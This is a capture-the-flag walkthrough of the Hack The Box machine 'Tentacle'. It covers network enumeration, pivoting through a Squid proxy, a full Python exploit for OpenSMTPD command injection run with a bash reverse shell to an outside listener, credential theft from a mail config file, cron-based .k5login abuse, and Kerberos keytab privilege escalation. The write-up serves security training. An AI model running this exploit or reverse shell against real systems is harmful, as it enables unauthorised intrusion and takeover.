Tentacle

About

Tentacle
IP	10.129.108.83
OS	Linux
Difficulty	Hard

nmap

└─$ nmap -Pn -sV -sC -p- -oA Tentacle 10.129.109.74 
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-20 05:56 EDT
Stats: 0:00:23 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 0.36% done
Stats: 0:01:10 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 1.44% done; ETC: 07:19 (1:21:08 remaining)
Stats: 0:22:30 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 68.83% done; ETC: 06:29 (0:10:11 remaining)
Stats: 0:22:30 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 68.83% done; ETC: 06:29 (0:10:12 remaining)
Nmap scan report for 10.129.109.74
Host is up (0.81s latency).
Not shown: 65530 filtered ports
PORT     STATE  SERVICE      VERSION
22/tcp   open   ssh          OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey: 
|   3072 8d:dd:18:10:e5:7b:b0:da:a3:fa:14:37:a7:52:7a:9c (RSA)
|   256 f6:a9:2e:57:f8:18:b6:f4:ee:03:41:27:1e:1f:93:99 (ECDSA)
|_  256 04:74:dd:68:79:f4:22:78:d8:ce:dd:8b:3e:8c:76:3b (ED25519)
53/tcp   open   domain       ISC BIND 9.11.20 (RedHat Enterprise Linux 8)
| dns-nsid: 
|_  bind.version: 9.11.20-RedHat-9.11.20-5.el8
88/tcp   open   kerberos-sec MIT Kerberos (server time: 2021-03-20 10:31:34Z)
3128/tcp open   http-proxy   Squid http proxy 4.11
|_http-server-header: squid/4.11
|_http-title: ERROR: The requested URL could not be retrieved
9090/tcp closed zeus-admin
Service Info: Host: REALCORP.HTB; OS: Linux; CPE: cpe:/o:redhat:enterprise_linux:8

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1798.99 seconds

Port 3128

We are met with an error page stating the following:

ERROR
The requested URL could not be retrieved

The following error was encountered while trying to retrieve the URL: /
    *Invalid URL*

Some aspect of the requested URL is incorrect.

Some possible problems are:
    *Missing or incorrect access protocol (should be "http://" or similar)
    *Missing hostname
    *Illegal double-escape in the URL-Path
    *Illegal character in hostname; underscores are not allowed.

Your cache administrator is j.nakazawa@realcorp.htb.

---

Generated Sat, 20 Mar 2021 10:46:32 GMT by srv01.realcorp.htb (squid/4.11)

Out of this we gain two pieces of information:

j.nakazawa@realcorp.htb
srv01.realcorp.htb

The email of the administrator which may come in handy later for a login, and the server which is hosting this site.

DNS Enumeration

Given we only have domains to work with, we decide to do some DNS enumeration.

dig

❯ dig realcorp.htb

; <<>> DiG 9.10.6 <<>> realcorp.htb
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 50617
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;realcorp.htb.			IN	A

;; AUTHORITY SECTION:
.			60	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2021032100 1800 900 604800 86400

;; Query time: 11 msec
;; SERVER: 127.0.0.1#53(127.0.0.1)
;; WHEN: Sun Mar 21 16:44:47 AEDT 2021
;; MSG SIZE  rcvd: 105

gobuster dns

❯ ~ gobuster dns -d realcorp.htb -r 10.10.10.224:53 -i -w Documents/SecLists/Discovery/DNS/subdomains-top1million-110000.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Domain:     realcorp.htb
[+] Threads:    10
[+] Resolver:   10.10.10.224:53
[+] Show IPs:   true
[+] Timeout:    1s
[+] Wordlist:   Documents/SecLists/Discovery/DNS/subdomains-top1million-110000.txt
===============================================================
2021/04/16 18:50:54 Starting gobuster in DNS enumeration mode
===============================================================
2021/04/16 18:50:56 [-] Unable to validate base domain: realcorp.htb (lookup realcorp.htb on 127.0.0.1:53: no such host)
Found: ns.realcorp.htb [10.197.243.77]
Found: proxy.realcorp.htb [10.197.243.77]
Found: wpad.realcorp.htb [10.197.243.31]

DNS enumeration was a success. We have a few different subdomains to go through. To make accessing these subdomains and IP addresses easier, we need to setup a proxychains.

proxychains

Setting up the proxychains configuration file as below using the IP addresses we got above:

[ProxyList]
# HTB: tentacle
http   10.10.10.224     3128
http   127.0.0.1        3128
http   10.197.243.77    3128

wpad

Now that we can access the subdomains previously found we vist wpad.realcorp.htb. For context, WPAD stands for Web Proxy Auto-Discovery Protocol.

From Wikipedia:

The Web Proxy Auto-Discovery (WPAD) Protocol is a method used by clients to locate the URL of a configuration file using DHCP and/or DNS discovery methods. Once detection and download of the configuration file is complete, it can be executed to determine the proxy for a specified URL.

http://wpad.example.com/wpad.dat

Given this we curl for http://wpad.realcorp.htb/wpad.dat:

$proxychains curl http://wpad.realcorp.htb/wpad.dat
ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-10.10.10.224:3128-<>-127.0.0.1:3128-<>-10.197.243.77:3128-<><>-10.197.243.31:80-<><>-OK
function FindProxyForURL(url, host) {
    if (dnsDomainIs(host, "realcorp.htb"))
        return "DIRECT";
    if (isInNet(dnsResolve(host), "10.197.243.0", "255.255.255.0"))
        return "DIRECT"; 
    if (isInNet(dnsResolve(host), "10.241.251.0", "255.255.255.0"))
        return "DIRECT"; 
 
    return "PROXY proxy.realcorp.htb:3128";
}

10.241.251.0

We have already enumerated the 10.197.243.0 networking, so we are going to take a look at the other IP address in the wpad.dat file.

proxychains nmap -sT --min-rate 2500 -Pn 10.241.251.0/24

Which gave us: 10.241.251.113

proxychains nmap -sT -sC -sV --min-rate 2500 -Pn 10.241.251.113

PORT  STATE SERVICE VERSION
25/tcp open  smtp    OpenSMTPD
| smtp-commands: smtp.realcorp.htb Hello nmap.scanme.org [10.241.251.1], pleased to meet you, 8BITMIME, ENHANCEDSTATUSCODES, SIZE 36700160, DSN, HELP,
|_ 2.0.0 This is OpenSMTPD 2.0.0 To report bugs in the implementation, please contact bugs@openbsd.org 2.0.0 with full details 2.0.0 End of HELP info
Service Info: Host: smtp.realcorp.htb

SMTP Exploit

Google-fu reveals: https://blog.firosolutions.com/exploits/opensmtpd-remote-vulnerability/

import socket, time
import sys
if len(sys.argv) < 4:
    print("usage: getShell.py <host> <port> <command>")
    exit()
HOST = sys.argv[1]
PORT = int(sys.argv[2])
rev_shell_cmd = sys.argv[3]
payload = b"""\r\n

#0\r\n
#1\r\n
#2\r\n
#3\r\n
#4\r\n
#5\r\n
#6\r\n
#7\r\n
#8\r\n
#9\r\n
#a\r\n
#b\r\n 
#c\r\n
#d\r\n
""" + rev_shell_cmd.encode() + b"""
.
"""
for res in socket.getaddrinfo(HOST, PORT, socket.AF_UNSPEC, socket.SOCK_STREAM):
    af, socktype, proto, canonname, sa = res
    try:
        s = socket.socket(af, socktype, proto)
    except OSError as msg:
        s = None
        continue
    try:
        s.connect(sa)
    except OSError as msg:
        s.close()
        s = None
        continue
    break
if s is None:
    print('could not open socket')
    sys.exit(1)
with s:
    data = s.recv(1024)
    print('Received', repr(data))
    time.sleep(1)
    print('SENDING HELO')
    s.send(b"helo test.com\r\n")
    data = s.recv(1024)
    print('RECIEVED', repr(data))
    s.send(b"MAIL FROM:<;for i in 0 1 2 3 4 5 6 7 8 9 a b c d;do read r;done;sh;exit 0;>\r\n")
    time.sleep(1)
    data = s.recv(1024)
    print('RECIEVED', repr(data))
    s.send(b"RCPT TO:<j.nakazawa@realcorp.htb>\r\n")
    data = s.recv(1024)
    print('RECIEVED', repr(data))
    s.send(b"DATA\r\n")
    data = s.recv(1024)
    print('RECIEVED', repr(data))
    s.send(payload)
    data = s.recv(1024)
    print('RECIEVED', repr(data))
    s.send(b"QUIT\r\n")
    data = s.recv(1024)
    print('RECIEVED', repr(data))
print("Exploited Check you netcat :D")
s.close()

Exploit using:

proxychains python3 getShell.py 10.241.251.113 25 'bash -c "exec bash -i &> /dev/tcp/10.10.14.9/5050 <&1"'

and we get:

$nc -lvp 5050
Listening on 0.0.0.0 5050
Connection received on 10.10.10.224 49024
bash: cannot set terminal process group (17): Inappropriate ioctl for device
bash: no job control in this shell
root@smtp:~#

SMTP to User

We go to the home directory of our user, j.nakazawa:

root@smtp:/home/j.nakazawa# ls -la
ls -la
total 16
drwxr-xr-x. 1 j.nakazawa j.nakazawa   59 Dec  9 12:31 .
drwxr-xr-x. 1 root       root         24 Dec  8 10:56 ..
lrwxrwxrwx. 1 root       root          9 Dec  9 12:31 .bash_history -> /dev/null
-rw-r--r--. 1 j.nakazawa j.nakazawa  220 Apr 18  2019 .bash_logout
-rw-r--r--. 1 j.nakazawa j.nakazawa 3526 Apr 18  2019 .bashrc
-rw-------. 1 j.nakazawa j.nakazawa  476 Dec  8 19:12 .msmtprc
-rw-r--r--. 1 j.nakazawa j.nakazawa  807 Apr 18  2019 .profile
lrwxrwxrwx. 1 root       root          9 Dec  9 12:31 .viminfo -> /dev/null

root@smtp:/home/j.nakazawa# cat .msmtprc
cat .msmtprc
# Set default values for all following accounts.
defaults
auth           on
tls            on
tls_trust_file /etc/ssl/certs/ca-certificates.crt
logfile        /dev/null

# RealCorp Mail
account        realcorp
host           127.0.0.1
port           587
from           j.nakazawa@realcorp.htb
user           j.nakazawa
password       sJB}RM>6Z~64_
tls_fingerprint	C9:6A:B9:F6:0A:D4:9C:2B:B9:F6:44:1F:30:B8:5E:5A:D8:0D:A5:60

# Set a default account
account default : realcorp

Unfortunately for us the above credentials do not work instantly over ssh.

We need to generate a kerberos ticket in order to login as j.nakazawa.

Kerberos

Installation:
```
sudo apt install krb5-user
```
Modify /etc/hosts:
```
10.10.10.224 srv01.realcorp.htb
```

Modify /etc/krb5.conf:

[libdefaults]
    default_realm = REALCORP.HTB

[realms]
    REALCORP.HTB = {
        kdc = 10.10.10.224

Ticket generation, use sJB}RM>6Z~64_ as the password:
```
kinit j.nakazawa
```
Login:

ssh j.nakazawa@10.10.10.224

user.txt

[j.nakazawa@srv01 ~]$ ls
user.txt
[j.nakazawa@srv01 ~]$ cat user.txt
c78abea6075164605c634d08c460bf2c

User to Admin

Through basic enumeration we come across the following:

[j.nakazawa@srv01 ~]$ cat /etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root

# For details see man 4 crontabs

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name  command to be executed
* * * * * admin /usr/local/bin/log_backup.sh

Viewing the log_backup.sh:

[j.nakazawa@srv01 ~]$ cat /usr/local/bin/log_backup.sh
#!/bin/bash
/usr/bin/rsync -avz --no-perms --no-owner --no-group /var/log/squid/ /home/admin/
cd /home/admin
/usr/bin/tar czf squid_logs.tar.gz.`/usr/bin/date +%F-%H%M%S` access.log cache.log
/usr/bin/rm -f access.log cache.log

This script is backing up everything from /var/log/squid to /home/admin. Whilst we can’t access /var/log/squid directly, we can copy a file into that directory which will be passed to /home/admin.

cd /tmp
vim .k5login
j.nakazawa@REALCORP.HTB
:wq
cp .k5login /var/log/squid

From here we are able to login as admin: ssh admin@srv01.realcorp.htb

Admin to Root

[admin@srv01 ~]$ klist -k /etc/krb5.keytab
Keytab name: FILE:/etc/krb5.keytab
KVNO Principal
---- --------------------------------------------------------------------------
   2 host/srv01.realcorp.htb@REALCORP.HTB
   2 host/srv01.realcorp.htb@REALCORP.HTB
   2 host/srv01.realcorp.htb@REALCORP.HTB
   2 host/srv01.realcorp.htb@REALCORP.HTB
   2 host/srv01.realcorp.htb@REALCORP.HTB
   2 kadmin/changepw@REALCORP.HTB
   2 kadmin/changepw@REALCORP.HTB
   2 kadmin/changepw@REALCORP.HTB
   2 kadmin/changepw@REALCORP.HTB
   2 kadmin/changepw@REALCORP.HTB
   2 kadmin/admin@REALCORP.HTB
   2 kadmin/admin@REALCORP.HTB
   2 kadmin/admin@REALCORP.HTB
   2 kadmin/admin@REALCORP.HTB
   2 kadmin/admin@REALCORP.HTB

kadmin -k -t /etc/krb5.keytab -p kadmin/admin@REALCORP.HTB

add_principal root@REALCORP.HTB

kadmin:  add_principal root@REALCORP.HTB
No policy specified for root@REALCORP.HTB; defaulting to no policy
Enter password for principal "root@REALCORP.HTB": 
Re-enter password for principal "root@REALCORP.HTB": 
Principal "root@REALCORP.HTB" created.

[admin@srv01 ~]$ ksu root
WARNING: Your password may be exposed if you enter it here and are logged 
         in remotely using an unsecure (non-encrypted) channel. 
Kerberos password for root@REALCORP.HTB: : 
Authenticated root@REALCORP.HTB
Account root: authorization for root@REALCORP.HTB successful
[Last failed login: Sat Jan 30 15:25:07 GMT 2021 from 10.10.14.128 on ssh:notty]
[There was 1 failed login attempt since the last successful login.]
Changing uid to root (0)
[root@srv01 admin]# whoami && cat /root/root.txt
root
3b69371ab6b9677313f9ac1fe2c8c7d8

About#

nmap#

Port 3128#

DNS Enumeration#

dig#

gobuster dns#

proxychains#

wpad#

10.241.251.0#

SMTP Exploit#

SMTP to User#

Kerberos#

user.txt#

User to Admin#

Admin to Root#